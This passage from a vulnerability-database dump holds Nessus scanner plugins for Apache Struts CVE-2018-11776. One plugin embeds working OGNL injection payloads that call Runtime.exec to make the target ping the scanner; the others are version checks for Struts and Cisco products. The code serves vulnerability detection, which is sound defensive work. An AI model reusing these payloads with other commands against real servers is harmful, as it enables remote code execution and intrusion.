script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach var cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match4 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match4))\n {\n urls = make_list(urls, match4[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\n\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\nscanner_ip = compat::this_host();\ntarget_ip = get_host_ip();\nvuln = FALSE;\n\nua = get_kb_item(\"global_settings/http_user_agent\");\nif (empty_or_null(ua))\n ua = 'Nessus';\n\npat = hexstr(rand_str(length:10));\n\nos = get_kb_item(\"Host/OS\");\nif (!empty_or_null(os) && \"windows\" >< tolower(os))\n{\n ping_cmd = \"ping%20-n%203%20-l%20500%20\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip + \" and greater 500\";\n}\nelse\n{\n ping_cmd = \"ping%20-c%203%20-p%20\" + pat + \"%20\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip;\n}\n\npayload_redirect = \"%24%7B%7B57550614+16044095%7D%7D/\";\npayload_redirect_verify_regex = \"Location: .*\\[73594709\\]\";\n\npayload_2_2 = \"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27\" + ping_cmd + \"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/\";\n\npayload_2_3 = \"%24%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23cmd%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27\" + ping_cmd + \"%27%29%29%7D/\";\n\nfunction namespace_inject(url, payload)\n{\n local_var bits, last, attack_url;\n\n # find the last / and put it after\n bits = split(url, sep:\"/\", keep:TRUE);\n last = max_index(bits) - 1;\n for (var i=0;i<last;i++)\n attack_url = attack_url + bits[i];\n attack_url = attack_url + payload;\n attack_url = attack_url + bits[last];\n\n return attack_url;\n}\n\nforeach var url (urls)\n{\n # first we try the 2.3.x payload\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n attack_url = namespace_inject(url:url, payload:payload_2_3);\n\n req =\n 'GET ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n '\\n';\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter,timeout:timeout);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n var snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic. '+\n 'Below is the response :' +\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic and looking for'+\n '\\nthe pattern sent in our packet (' + pat + '). Below is the response :'+\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # next we try the 2.2.x payload\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n attack_url = namespace_inject(url:url, payload:payload_2_2);\n\n req =\n 'GET ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n '\\n';\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter,timeout:timeout);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic. '+\n 'Below is the response :' +\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic and looking for'+\n '\\nthe pattern sent in our packet (' + pat + '). Below is the response :'+\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # and finally, we try a simple redirect namespace injection\n attack_url = namespace_inject(url:url, payload:payload_redirect);\n\n res = http_send_recv3(\n method : \"GET\",\n item : attack_url,\n port : port,\n exit_on_fail : TRUE,\n follow_redirect: 0\n );\n\n if (res[1] =~ payload_redirect_verify_regex)\n {\n vuln = TRUE;\n vuln_url = attack_url;\n report =\n '\\nNessus confirmed this issue by injecting a simple OGNL addition payload'+\n '\\n( ${{57550614+16044095}} ) into a redirect action namespace. Below is' +\n '\\nthe response :'+\n '\\n\\n' + snip +\n '\\n' + res[1] +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(vuln_url),\n output : report\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:33", "description": "According to its self-reported version, the Cisco Unified Communications Manager (CUCM) running on the remote device is affected by a remote code execution vulnerability. Please see the included Cisco BID and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-09-05T00:00:00", "type": "nessus", "title": "Cisco Unified Communication Manager Apache Struts RCE (CSCvm14042)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager"], "id": "CISCO-SA-20180823-APACHE-STRUTS-UCM.NASL", "href": "https://www.tenable.com/plugins/nessus/112289", "sourceData": "#TRUSTED 5538e58acd3b9c3603d69886501b4d03206d911e89a8d42c5b4e7eca707c4d625bc7498ef348a9ccbcb5336c36a12a8c522e9b7208a928417ca393d93d9b75b3674b5020a3adf4e9ded633106ddd86864d79657cbdb95644342b2f275592d8f9e6fc1f66ff78f01c1325c212b34be69ad9e19e9079abea97ba850b3de2a5b4c17ea6bcb025e35351d747f7a3bfd9a692abe32cfb1acd6df9a1ed4437cef173f52741ba940ea420a6a307c28113c77d3911f694bbd8b4770b2e393e952b7721160a3ace2b9a105b946878666ddb6b6277e8dd37cc0b540d3cab9ba05675333685d3567dc787a898345d49807afa2c4e8dadc80157671c59645ec28d4d731254f700afcdde8541b7fc40f5bf22104a815dfb9ffec8005793c65a930bc671999876981b110d057967ac4aec3e59486c42d91bfdbacd15266c2227ee145c9c1f68b594923b7c279533429a89c5a243111afa033972ae83c9fc79e2601de851679ed9c299cb484ffd80c57ac3b34925bb3cba116fcda0316d36ecd2faa6315da0eb4e36614b14339a5b4a8bf1733e633b7f9f29f76f24eb6dbba11d66280d6e3e0195481f24ff5256f30dbac9ca2fbd0297cc6cc377e602403cf222d850e159cf5a4a46f673c55f9ece04e1b4703056a271d88239f32fd0101e729543bc9b902ffe81653218ce1f59a8de7edc84c8cd3a6afeafbbf24ba8b4385bcd815cde5a4733f9\n#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112289);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14042\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Unified Communication Manager Apache Struts RCE (CSCvm14042)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Unified\nCommunications Manager (CUCM) running on the remote device is affected\nby a remote code execution vulnerability. Please see the included\nCisco BID and the Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14042\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14042.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ucm_detect.nbin\");\n script_require_keys(\"Host/Cisco/CUCM/Version\", \"Host/Cisco/CUCM/Version_Display\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Unified Communications Manager\");\n\nversion_list = make_list(\n '11.0.1.10000.10',\n '11.5.1.10000.6',\n '12.0.1.10000.10',\n '12.5.0.98000.981');\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['display_version'],\n 'bug_id' , \"CSCvm14042\");\n\ncisco::check_and_report(product_info:product_info, workarounds:workarounds, workaround_params:workaround_params, reporting:reporting, vuln_versions:version_list);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:39:40", "description": "The version of Apache Struts running on the remote host is 2.3.x prior to 2.3.35, or 2.5.x prior to 2.5.17. It, therefore, contains a possible remote code execution vulnerability when results are used without setting a namespace along with an upper action that does not have a namespace set or has a wildcard namespace set.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-08-22T00:00:00", "type": "nessus", "title": "Apache Struts CVE-2018-11776 Results With No Namespace Possible Remote Code Execution (S2-057)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_17.NASL", "href": "https://www.tenable.com/plugins/nessus/112036", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112036);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts CVE-2018-11776 Results With No Namespace Possible Remote Code Execution (S2-057)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by a possible remote code execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.3.x\nprior to 2.3.35, or 2.5.x prior to 2.5.17. It, therefore, contains a\npossible remote code execution vulnerability when results are used\nwithout setting a namespace along with an upper action that does not\nhave a namespace set or has a wildcard namespace set.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2018/Aug/46\");\n script_set_attribute(attribute:\"see_also\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.3\", \"max_version\" : \"2.3.34\", \"fixed_version\" : \"2.3.35\" },\n { \"min_version\" : \"2.5\", \"max_version\" : \"2.5.16\", \"fixed_version\" : \"2.5.17\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:17", "description": "According to its self-reported version, the Cisco Unified Communications Manager IM & Presence Service is affected by a Remote Code Execution vulnerability. Please see the included Cisco BIDs and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-09-05T00:00:00", "type": "nessus", "title": "Cisco Unified Communications Manager IM & Presence Service Apache Struts RCE (CSCvm14049)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager_im_and_presence_service", "cpe:/a:cisco:unified_communications_manager", "cpe:/a:cisco:unified_presence_server"], "id": "CISCO-SA-20180823-APACHE-STRUTS-CUPS.NASL", "href": "https://www.tenable.com/plugins/nessus/112288", "sourceData": "#TRUSTED 531d8e919a578f5c402d55046279c6aa0319d64b11e6cfd1d400748c61e7c7ccaa711a8f2191f3390f64108dffec9cda1cfe6622e5965ce8740b74f709d83c9d97499c02c97b3848ad634219e609ff7acf98126943660349b42695aa34d768104c488c436c13e7667ce892766c7d106e37048ddcfba1ac2b772443e7a905b1e8a682e45817ad69bc684a2bce250dff79993839689a846ddc0e06ab184bbfc3958301fba47c2702e4bcc930e1eb90226c73a1a769e5c70c5b10a8341dac93b861d607f4713d05ce8f97544352f71f3a88dc9c2786a8e8747ac50f485c2b647276a41f88bb7c7cd340c7e3af67cd61a049cca011e3d9942ca32f0319c5fec33e651fb67d3d5f6f7859ea8414f333e21cac76fa1b4d3547ce78f376a0411eb50ef2dcbc163acce202bce2ef787f11028a173ada909c2b9bd82caddf4bb845e8159b4e4fb812ad4e8e6e24fad03496b0ac669c65e83433510c8b2b7915fa57f2f1f21d5866de373bf1fa4ecf5d5a50820a8f105b1744bd5693eda065b42bbb5486f28a0d2a94e6aa24fb12daafc9bf238b9c0add4691b0cbe3fe731b48a92d99ad9d4ffa22d31da79c776337c955cf2d58045aecf66c7250e7e147e1c6c36943213d6eea7c6c09437c8ec741e07e289ae48a2ec13c44a4b8ccf0d1b9824180479f8e787bdd465aa0346c61b3dcb6fe34ee45d7327e52b9c09a0dc5a05e7f4ed13b56\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112288);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14049\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Unified Communications Manager IM & Presence Service Apache Struts RCE (CSCvm14049)\");\n script_summary(english:\"Checks the Cisco Unified Communications Manager version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Unified\nCommunications Manager IM & Presence Service is affected by a Remote\nCode Execution vulnerability. Please see the included Cisco BIDs and\nthe Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14049\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14049.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager_im_and_presence_service\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_presence_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/UCOS/Cisco Unified Presence/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Unified Presence\");\n\nversion_list = make_list('11.0.1', '11.5.1', '12.0.1');\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , \"CSCvm14049\");\n\ncisco::check_and_report(product_info:product_info, workarounds:workarounds, workaround_params:workaround_params, reporting:reporting, vuln_versions:version_list);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:39:50", "description": "According to its self-reported version, the Cisco Identity Services Engine Software is affected by a struts2 namespace vulnerability.\nPlease see the included Cisco BID and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-08-31T00:00:00", "type": "nessus", "title": "Cisco Identity Services Engine Struts2 Namespace Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/h:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine_software"], "id": "CISCO-SA-20180823-APACHE-STRUTS-ISE.NASL", "href": "https://www.tenable.com/plugins/nessus/112219", "sourceData": "#TRUSTED 97aa159b84dc044b30c1959493ad4c2ef0b54f85d3e848f88bee9278a7ddad8a181a74909f1d0d76ce1b6789d6c52e06d8149ee1cd6b40ddc4809e01f93833be8020dacc4dd4a97c9adce91fde281659f57715154563c57a7067c369b7d014b2a20c63c0692370955493497ee5cc676ed67b7252f230321c84a756e4f7c6d300d603cb3a8441874a6b4a31d3e38b204cdfedfac2e159a1a6050a4e54e7e7d3a571f78bedb4ce38b25be27cfd186ec5a6d7ecb38bfcfc47307d6e8f2129c339cc2a40a9c1c376b220a07abb868589c8dd6bda1077121b2eaf32b235e36d05a0421ed24805286671b039794ad9999fff2a8ceea76e4cc2f7cf8611fd9b28ec473949aba55b3f4a0cfd91455716d0733c829031593c83528f5d8fbcb05351beaad63c70c1095d11b5d38e04cba7fd3800c21beb5e6382e20a3ccb6d00ac98d43d6ea3f1ff6566edeb9f0e8d98068cf9d6c881c0642ffda92b77e30b7b7ddf74136dca18b0813568c2f591018a81531bae509d7df421eef82e4d4fba2ffd1b76b3a561e1018e2630dac16d14f05b6342fb8c08ca13b94882eb818ba59f9f11fce385b9a3bf4dd7f0524b9d50096716733342ac10b83b1e52ba609ba841786810a1c88816deeb90ef81ff652cb02d46c1babdec6c8b9d00657c051ee857779d7fd75b624224079533e69b4308b4ee87d8a1cc79d022715df20de81e55f351e7a543e7\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112219);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14030\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Identity Services Engine Struts2 Namespace Vulnerability\");\n script_summary(english:\"Checks the Cisco Identity Services Engine Software version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Identity Services\nEngine Software is affected by a struts2 namespace vulnerability.\nPlease see the included Cisco BID and the Cisco Security Advisory for\nmore information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14030\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14030.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n 